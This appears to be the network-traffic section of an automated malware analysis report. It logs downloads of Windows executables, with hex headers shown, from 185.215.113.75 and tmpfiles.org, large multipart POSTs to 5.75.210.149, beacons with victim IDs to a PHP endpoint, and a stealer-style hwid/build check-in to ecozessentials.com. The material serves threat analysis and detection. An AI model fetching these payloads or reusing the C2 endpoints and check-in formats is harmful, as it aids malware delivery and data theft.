00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:18 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sun, 16 Feb 2025 19:15:42 GMTConnection: keep-aliveETag: "67b2395e-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d1 4f 8b d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 20 00 00 00 04 00 00 00 00 00 00 1a 3a 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 06 17 01 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 39 00 00 4f 00 00 00 00 40 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 34 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 1f 00 00 00 20 00 00 00 20 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 40 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 00 3c 05 00 00 80 00 00 00 3c 05 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:25 GMTContent-Type: application/octet-streamContent-Length: 1865728Last-Modified: Tue, 18 Feb 2025 06:24:02 GMTConnection: keep-aliveETag: "67b42782-1c7800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4c 04 b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 84 04 00 00 b8 00 00 00 00 00 00 00 b0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 49 00 00 04 00 00 7a e7 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 c0 05 00 6b 00 00 00 00 b0 05 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 05 00 00 10 00 00 00 9c 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 fc 02 00 00 00 b0 05 00 00 04 00 00 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 05 00 00 02 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 d0 05 00 00 02 00 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 76 6d 68 77 72 76 68 00 a0 19 00 00 00 30 00 00 9e 19 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 79 64 62 69 74 61 00 10 00 00 00 a0 49 00 00 04 00 00 00 52 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 49 00 00 22 00 00 00 56 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:30 GMTContent-Type: application/octet-streamContent-Length: 2122240Last-Modified: Tue, 18 Feb 2025 06:24:24 GMTConnection: keep-aliveETag: "67b42798-206200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 ce d9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 70 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 70 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 7a 74 6d 73 62 6a 6a 00 b0 19 00 00 d0 30 00 00 a2 19 00 00 9a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6d 6d 7a 66 6d 61 71 00 10 00 00 00 80 4a 00 00 04 00 00 00 3c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 40 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:35 GMTContent-Type: application/octet-streamContent-Length: 2122240Last-Modified: Tue, 18 Feb 2025 06:24:24 GMTConnection: keep-aliveETag: "67b42798-206200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 ce d9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 70 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 70 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 7a 74 6d 73 62 6a 6a 00 b0 19 00 00 d0 30 00 00 a2 19 00 00 9a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6d 6d 7a 66 6d 61 71 00 10 00 00 00 80 4a 00 00 04 00 00 00 3c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 40 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:41 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Tue, 18 Feb 2025 06:24:13 GMTConnection: keep-aliveETag: "67b4278d-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 4a db 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 74 6a 76 77 75 79 00 10 1a 00 00 90 4f 00 00 0c 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 79 68 65 74 6b 6a 64 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 5.75.210.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----q1va1d2d2v3w47ymophdHost: 5.75.210.149Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/20891284/xclient.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gdba168gln7qieuaaiwbHost: 5.75.210.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0r9rq1ngd268ymoz5fcbHost: 5.75.210.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----xt26fcj5fukx4790zukfHost: 5.75.210.149Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2djeknyuk6f3e3ekx4opHost: 5.75.210.149Content-Length: 5637Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----l6xtrq1vs0zm7q9hd26xHost: 5.75.210.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----vkfcjwbiekngvaaieuknHost: 5.75.210.149Content-Length: 489Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/20891284/xclient.exe HTTP/1.1Host: tmpfiles.orgCookie: XSRF-TOKEN=eyJpdiI6IkFsM0ZRQXV6ZHQ1SmoveW9rM3pQaEE9PSIsInZhbHVlIjoiU21ZU1QvOCtJWnNRL2tkWTVwc3pSK1pwU2JXRmdRTStEbDVSUjdvQWUvTmNISUFzZHFNaWcwVWNzZmhVZmVZRmN0Y2U1bjRiU3pYYm9SdDQ1RDFSak1takROd05PbmthWVNNejVENkYxYTU3Y09SNUVHNkRlRmRrSWNVc3MrMWwiLCJtYWMiOiIyZTRkNDMwM2NjNGI2ZTY3M2JmYTlhOTc4MTM0MzYwOTgyNWZiNTliMzE5MmMwNTJiODQ1NTlkZTViZjJjNTFlIn0%3D; tmpfiles_session=eyJpdiI6InBvTlIzQmo3WUk0ZlRDOS9GTmEzaXc9PSIsInZhbHVlIjoiZW0wOTl0b1AxSlRqY2ZPUUFWeWh6TThnbVBNWlhwYjJJM2xiQ0VqZUNBWVplVWVRbFB0OXN4c0V6dWRmaitUeXFTNVdzMFFqVHowNDh4UmlsdTdGVEozbzBJYkJtR3B6QlRXczhxUTYzMU9CL053T1YwYTh1L3VZWjA0TnRoQXciLCJtYWMiOiJhMjI4NmQyZTYwMTc1ZGY3OTU0YWM0Y2YyMWZiZjgzMTI4ZmYzNGIxMTViMDAyZWU5MjczYmVjN2ZjYWE5YWMxIn0%3D
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----d2nyc2nozmo8qq168q9hHost: 5.75.210.149Content-Length: 505Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----t2no8q9h4o89rqqqq90zHost: 5.75.210.149Content-Length: 213453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----sj5ph4e3e3oh4ekno8ycHost: 5.75.210.149Content-Length: 55081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pz5x4wbas0zmyukf3o8gHost: 5.75.210.149Content-Length: 142457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vasr168glnyu3ophvknHost: 5.75.210.149Content-Length: 493Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /files/7984100976/Ta3ZyUR.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 33 31 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1083135001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6495630113/qFqSpAp.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 33 32 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1083218001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/8091669947/m5UP2Yj.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 33 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1083537001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ecozessentials.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e6cb1c8fc7cd1659.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFHost: ecozessentials.comContent-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 42 46 45 41 43 42 45 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="hwid"17BFEACBE2684217651120------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="build"default------AAEHDAAKEHJECBFHCBKF--
Source: global traffic	HTTP traffic detected: GET /files/1069485814/jROrnzx.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 34 37 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1084785001&unit=246122658369
